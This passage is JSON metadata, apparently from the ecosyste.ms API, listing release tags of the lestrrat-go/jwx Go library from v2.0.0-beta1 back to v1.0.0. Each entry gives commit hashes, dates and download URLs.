ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_